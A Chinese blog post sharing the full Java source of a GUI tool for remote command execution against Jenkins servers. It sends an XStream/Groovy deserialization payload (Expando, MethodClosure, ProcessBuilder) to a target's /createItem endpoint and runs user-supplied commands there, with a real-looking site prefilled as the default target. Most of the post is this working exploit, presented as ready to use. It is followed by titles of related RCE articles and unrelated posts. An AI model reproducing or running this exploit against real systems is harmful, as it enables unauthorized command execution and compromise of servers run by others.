昨天看小飞侠写的py的jenkins的脚本,昨天晚上在微信里评论今天写一个JAVA的GUI的tools.

早上花了点时间写一下:

code:

package com.tools;

	import java.io.BufferedReader;

	import java.io.IOException;

	import java.io.InputStreamReader;

	import java.io.PrintWriter;

	import java.net.URL;

	import java.net.URLConnection;

	import java.util.List;

import java.util.Map;

import javax.swing.JOptionPane;

	public class HttpRequest {

	    /**

	     * 向指定 URL 发送POST方法的请求

	     *

	     * @param url

	     *            发送请求的 URL

	     * @param param

	     *            请求参数,请求参数应该是 name1=value1&name2=value2 的形式。

	     * @return 所代表远程资源的响应结果

	     */

	    public static String sendPost(String url, String param) {

	        PrintWriter out = null;

	        BufferedReader in = null;

	        String result = "";

	        try {

	            URL realUrl = new URL(url);

	            // 打开和URL之间的连接

	            URLConnection conn = realUrl.openConnection();

	            // 设置通用的请求属性

	            conn.setRequestProperty("accept", " text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");

	            conn.setRequestProperty("connection", "Keep-Alive");

	            conn.setRequestProperty("user-agent",

	                    " Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");

	            conn.setRequestProperty("Content-Type", "application/xml");

	            conn.setRequestProperty("Cookie", "");

	            // 发送POST请求必须设置如下两行

	            conn.setDoOutput(true);

	            conn.setDoInput(true);

	            // 获取URLConnection对象对应的输出流

	            out = new PrintWriter(conn.getOutputStream());

	            // 发送请求参数

	            out.print(param);

	            // flush输出流的缓冲

	            out.flush();

	            // 定义BufferedReader输入流来读取URL的响应

	            in = new BufferedReader(

	                    new InputStreamReader(conn.getInputStream()));

	            String line;

	            while ((line = in.readLine()) != null) {

	                result += line;

	            }

	        } catch (Exception e) {

	        	JOptionPane.showMessageDialog(null, "POST异常!"+e);

//	            System.out.println("发送 POST 请求出现异常!"+e);

	            e.printStackTrace();

	        }

	        //使用finally块来关闭输出流、输入流

	        finally{

	            try{

	                if(out!=null){

	                    out.close();

	                }

	                if(in!=null){

	                    in.close();

	                }

	            }

	            catch(IOException ex){

	                ex.printStackTrace();

	            }

	        }

	        return result;

	    }

	}

  

package com.tools;

import java.awt.Component;

import java.awt.Container;

import java.awt.Dimension;

import java.awt.FlowLayout;

import java.awt.Label;

import java.awt.LayoutManager;

import java.awt.event.ActionEvent;

import java.awt.event.ActionListener;

import java.io.IOException;

import java.net.CookieHandler;

import javax.swing.JButton;

import javax.swing.JFrame;

import javax.swing.JOptionPane;

import javax.swing.JPanel;

import javax.swing.JTextArea;

import javax.swing.JTextField;

import javax.xml.soap.Text;

//jenkins

public class SQL extends JFrame {

	private Label inputLabel;

	private JTextField text;

	private JButton button;

	private JTextField command;

	private JTextField cmdcontent;

	private JTextField cookie;

	private JPanel jp;

	private JTextArea area;

	public void init() {

		Container cp = this.getContentPane();

		inputLabel = new Label("please input url:");

		cp.add(inputLabel);

		text = new JTextField("http://www.sufont.com/", 20);

		cp.add(text);

		button = new JButton("OK");

		cp.add(button);

		command = new JTextField("输入要执行的命令,例如:touch", 25);

		cmdcontent = new JTextField("执行命令的内容,例如:/tmp/qingteng-test-1", 25);

		cookie=new JTextField("cookie", 25);

		area=new JTextArea(20, 25);

		cp.add(cookie);

		cp.add(command);

		cp.add(cmdcontent);

		cp.add(area);

		area.setText("");

		this.setSize(450, 280);

		this.setVisible(true);

		this.setTitle("Jenkins远程命令利用工具-By:sevck");

		this.setLayout(new FlowLayout(2, 2, 2));

		this.setDefaultCloseOperation(3);

		this.setLocationRelativeTo(null);

		this.setResizable(false);

	}

	public SQL() {

		init();

		button.addActionListener(new ActionListener() {

			@Override

			public void actionPerformed(ActionEvent e) {

				// TODO Auto-generated method stub

				String url = text.getText();// get url content

				if (url.contains("http://")) {

					if (url.equalsIgnoreCase("http://")) {

						JOptionPane.showMessageDialog(null, "url is null");

					} else {

						HttpRequest con = new HttpRequest();

						String content = con.sendPost(url+ "/createItem?name=qt-sec", "<map><entry><groovy.util.Expando><expandoProperties> <entry><string>hashCode</string><org.codehaus.groovy.runtime.MethodClosure><delegate class='groovy.util.Expando' reference='../../../..'/><owner class='java.lang.ProcessBuilder'><command><string>"+command.getText()+"</string><string>"+cmdcontent.getText()+"</string></command><redirectErrorStream>false</redirectErrorStream></owner><resolveStrategy>0</resolveStrategy><directive>0</directive><parameterTypes/><maximumNumberOfParameters>0</maximumNumberOfParameters><method>start</method></org.codehaus.groovy.runtime.MethodClosure></entry></expandoProperties></groovy.util.Expando><int>1</int></entry></map>");

						JOptionPane.showMessageDialog(null, "命令执行完毕2!");

						System.out.println(content);

						area.setText("result:\r\n"+content);

						// try {

						//

						// Runtime.getRuntime().exec("rundll32 url.dll,FileProtocolHandler "+url);

						// } catch (IOException e1) {

						// // TODO Auto-generated catch blocks

						// e1.printStackTrace();

						// }

					}

				} else {

					JOptionPane.showMessageDialog(null, "加http://");

				}

			}

		});

	}

	public static void main(String[] args) {

		// TODO Auto-generated method stub

		new SQL();

	}

}

  界面写的比较简陋,能用就可以 ;)

jenkins远程命令执行利用工具的更多相关文章

  1. Jenkins远程命令执行漏洞(CVE-2018-1000861)

    此漏洞没有回显,直接利用orange的exp执行命令反弹shell 工具地址https://github.com/orangetw/awesome-jenkins-rce-2019 web服务器下写1 ...

  2. 威胁预警|Solr velocity模板注入远程命令执行已加入watchbog武器库,漏洞修补时间窗口越来越短

    概述 近日,阿里云安全团队监测到挖矿团伙watchbog更新了其使用的武器库,增加了最新Solr Velocity 模板注入远程命令执行漏洞的攻击方式,攻击成功后会下载门罗币挖矿程序进行牟利.建议用户 ...

  3. S2-045远程命令执行漏洞的利用

    Apache Struts2 远程命令执行 (S2-045) 漏洞介绍: 漏洞编号:S2-045CVE编号:CVE-2017-5638漏洞类型:远程代码执行漏洞级别:高危漏洞风险:黑客通过利用漏洞可以 ...

  4. Apache Tomcat远程命令执行漏洞(CVE-2017-12615) 漏洞利用到入侵检测

    本文作者:i春秋作家——Anythin9 1.漏洞简介 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 fals ...

  5. "Java 反序列化"过程远程命令执行漏洞

    一.漏洞描述   国外 FoxGlove 安全研究团队于2015年11月06日在其博客上公开了一篇关于常见 Java 应用如何利用反序列化操作进行远程命令执行的文章.原博文所提到的 Java 应用都使 ...

  6. 【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞

    2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确 ...

  7. WebLogic远程命令执行

    靶机说明 目标ip:172.16.53.28(window 2003) 本靶机所针对的序列化漏洞系列以及常见安全问题如下: 弱口令登陆控制台部署war包webshell CVE-2018-2893 C ...

  8. Weblogic wls9_async_response 反序列化远程命令执行漏洞(CVE-2019-2725)复现

    一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为 ...

  9. 【漏洞预警】Redis 4.x/5.x 远程命令执行高危漏洞

    2019年7月09日,阿里云应急响应中心监测到有安全研究人员披露Redis 4.x/5.x 远程命令执行高危漏洞利用代码工具.针对未授权或弱口令的Redis服务,攻击者通过构造特定请求,成功利用漏洞可 ...

随机推荐

  1. 一个容易被忽略的ReportingService超时问题

    我们在使用Sql Server Reporting Service开发报表的时候,经常会遇到报表超时的问题,报表超时的原因有很多,也有很多地方可以设置报表的超时时间,比如在报表中的数据源(dataso ...

  2. html5 图片热点area,map的用法

    今天看了一个html5在图片上面创建热点的标签,所谓图片热点就是给你一张图片然后你可以设置点击图片不同的位置进入不同的链接!如果下面是一张图片的话,里面在长方形.圆形.三角形区域都可以进入其他网页! ...

  3. Reverse Linked List II

    /** * Definition for singly-linked list. * struct ListNode { * int val; * ListNode *next; * ListNode ...

  4. Spring和MyBatis环境整合

    SSH框架的结合几乎家喻户晓,但是一般的中小项目,使用Spring和MyBatis就够了,而且MyBatis轻便好使,易上手,值得大家尝试一次. 开篇简介: Spring: Spring是一个轻量级的 ...

  5. sqlite加密

    一直使用sqlite来管理本地的数据,但是Xcode中的SDK中集成的sqlite是免费的,不提供加密模块,但是程序中用到的很多数据,有时候是不想让别人看到,一开始虑修改sqlite的源码,自己重新编 ...

  6. 转Class.forName()用法详解

    主要功能 Class.forName(xxx.xx.xx)返回的是一个类 Class.forName(xxx.xx.xx)的作用是要求JVM查找并加载指定的类, 也就是说JVM会执行该类的静态代码段 ...

  7. 微信利用PHP创建自定义菜单的方法

    在使用通用接口前,你需要做以下两步工作:1.拥有一个微信公众账号,并获取到appid和appsecret(在公众平台申请内测资格,审核通过后可获得)2.通过获取凭证接口获取到access_token注 ...

  8. postgresql之ctid的浅谈

       ctid: 表示数据记录的物理行当信息,指的是 一条记录位于哪个数据块的哪个位移上面. 跟oracle中伪列 rowid 的意义一样的:只是形式不一样.    例如这有个一表test:查看每行记 ...

  9. function adapter(函数适配器)和迭代器适配器

    所谓function adapter(函数适配器)是指能够将不同的函数对象(或是和某值或某寻常函数)结合起来的东西,它自身也是个函数对象. 迭代器适配器  运用STL中的迭代器适配器,可以使得算法能够 ...

  10. linux中的nm命令简介

    转:http://blog.csdn.net/stpeace/article/details/47089585 一般来说, 搞linux开发的人, 才会用到nm命令, 非开发的人, 应该用不到. 虽然 ...